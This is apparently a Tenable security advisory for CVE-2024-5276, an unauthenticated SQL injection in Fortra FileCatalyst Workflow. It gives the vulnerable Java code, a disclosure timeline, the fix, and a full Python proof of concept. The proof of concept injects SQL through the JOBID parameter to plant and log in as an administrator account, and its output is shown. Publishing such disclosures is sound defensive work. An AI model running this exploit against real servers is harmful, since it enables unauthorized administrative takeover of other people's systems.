Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Fortra FileCatalyst Workflow Unauthenticated SQLi

Critical

Synopsis

A SQL injection vulnerability exists in Fortra FileCatalyst Workflow v5.1.6 build 135 and earlier.

A user-supplied jobID is used to form the WHERE clause in an SQL query:

// class unlimited.core.l.p
 public xc findJob(String jobID) {
   if (jobID == null)
     return null;
   if (jobID.equals(""))
     return null;
   b query = new b("*", xc.ps, xc.yr + "='" + jobID + "'");
   xc pjret = null;
   ResultSet rs = null;
   Connection conn = this.hb.getDatabaseSettings().we().b();
   try {
     rs = this.mb.b((e)query, conn);
[...]
// class unlimited.core.l.c.b.b.b constructor
 public b(String columns, String from, String where) {
   this(columns, from, where, -1);
 }
[...]

An anonymous remote attacker can perform SQLi via the JOBID parameter in various URL endpoints of the workflow web application.

Proof of Concept

import requests
import argparse
import re
import sys 

def anon_logon(s, host, port, ctxpath):
  try:
    r = s.get(f'{host}:{port}{ctxpath}')
        
    # Find session token
    pat = '\/workflow\/jsp\/logon.jsp;jsessionid=[A-Za-z0-9]+'
        
    if(re.search(pat, r.text) is None):
      print('[-] Failed get logon URL.')
      return False
        
    # Redirect to login page
    logon_url = re.findall(pat, r.text)[0]
    r = s.get(f'{host}:{port}{logon_url}')
        
    # Perform anonymous login
    pat = '\/workflow\/logonAnonymous.do\?FCWEB.FORM.TOKEN=[A-Za-z0-9]+'
    if(re.search(pat,r.text) is None):
      print('[-] Failed to get anonymous login URL. Check anonymous login is enabled.')
      return False
       
    anon_logon_url = re.findall(pat, r.text)[0]
    r = s.get(f'{host}:{port}{anon_logon_url}')
    if r.status_code != 200:
      print('[-] Anonymous login failed. Check anonymous login is enabled.')
      return False

    return True 
  except requests.exceptions.RequestException as e:
    print(f'[-] Exception occurred: \n {e}')
    return False

if __name__ == '__main__':
  parser = argparse.ArgumentParser()
  parser.add_argument('-t','--target', help='target hostname or IP address (include http:// or https://)', required=True)
  parser.add_argument('-p','--port', type=int, default=80, help='target port (Default: %(default)s)')
  parser.add_argument('-c','--ctxpath', default='/workflow', help='Context path for the FileCatalyst Workflow webapp (Default: %(default)s)')
  args = parser.parse_args()
  host = args.target
  port = args.port
  ctxpath =  args.ctxpath
  
  s = requests.Session()

  print(f'[*] Logging in anonymously')
  if not anon_logon(s, host, port, ctxpath):
    sys.exit('[-] Failed to login anonymously.')

  print(f'[+] Anonymous login OK')

  # Add admin user 'opeartor' with password 'password123' 
  # Works for HSQLDB 
  url = f'{host}:{port}{ctxpath}/servlet/pdf_servlet'
  user = 'operator'
  password = 'password123'
  print(f'[*] Performing SQLi: add admin user, name: {user}, password: {password}') 

  sqli = f"1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{user}', NULL, '482C811DA5D5B4BC6D497FFA98491E38', '{user}FirstName', '{user}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{user}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"
  params = {"JOBID":f"{sqli}"}
  r = s.get(url, params=params)
    
  print(f'[*] Logging in as {user}')
  # Get logon token
  url = f'{host}:{port}{ctxpath}/jsp/logon.jsp'
  r = s.get(url)
  m = re.search('"FCWEB.FORM.TOKEN".*?value.*?"([a-zA-Z0-9]+?)"', r.text)
  if m is None:
    sys.exit(f'[-] Failed to get FCWEB.FORM.TOKEN') 
  fcweb_token = m.group(1)     

  # Logon 
  url = f'{host}:{port}{ctxpath}/logon.do'
  data = {'username': user, 'password': password,'FCWEB.FORM.TOKEN': fcweb_token, 'submit':'Login'} 
  r = s.post(url, data=data)
  if 'username/password are not correct' in r.text:
    sys.exit(f'[-] Failed to login as {user}') 
  else:
    print(f'[+] User {user} logged in')  
  
  '''
  # Access protected URL
  url = f'{host}:{port}{ctxpath}/jsp/about.jsp'
  r = s.get(url)
  print(r.status_code)
  print(r.text)
  '''
  
# python3 fcworkflow_sqli.py -t 'http(s)://<target-host>' -p 80
[*] Logging in anonymously
[+] Anonymous login OK
[*] Performing SQLi: add admin user, name: operator, password: password123
[*] Logging in as operator
[+] User operator logged in

 

Solution

Upgrade to FileCatalyst Workflow version 5.1.6 build 139 or later.

Disclosure Timeline

May 15, 2024 - Tenable requests security contact from Fortra.
May 15, 2024 - Fortra confirms security contact.
May 22, 2024 - Tenable discloses issue to Fortra.
May 22, 2024 - Fortra requests Tenable re-transmit PoC.
May 23, 2024 - Tenable resends PoC.
June 17, 2024 - Tenable requests status update from Fortra.
June 17, 2024 - Fortra requests PoC again and provides MFT upload link. Tenable sends PoC. Fortra acknowledges.
June 19, 2024 - Fortra requests clarification. Tenable provides clarification.
June 20, 2024 - Fortra confirms report and reserves CVE. Tenable acknowledges.
June 25, 2024 - Fortra informs Tenable that they've released a patch and advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2024-5276
Tenable Advisory ID: TRA-2024-25
CVSSv3 Base / Temporal Score:
9.8 / 9.1
CVSSv3 Vector:
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Products:
FileCatalyst Workflow version 5.1.6 build 135 or earlier
Risk Factor:
Critical

Advisory Timeline

June 25, 2024 - Initial release.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable Vulnerability Management trials created everywhere except UAE will also include Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable Vulnerability Management trials created everywhere except UAE will also include Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable Vulnerability Management trials created everywhere except UAE will also include Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training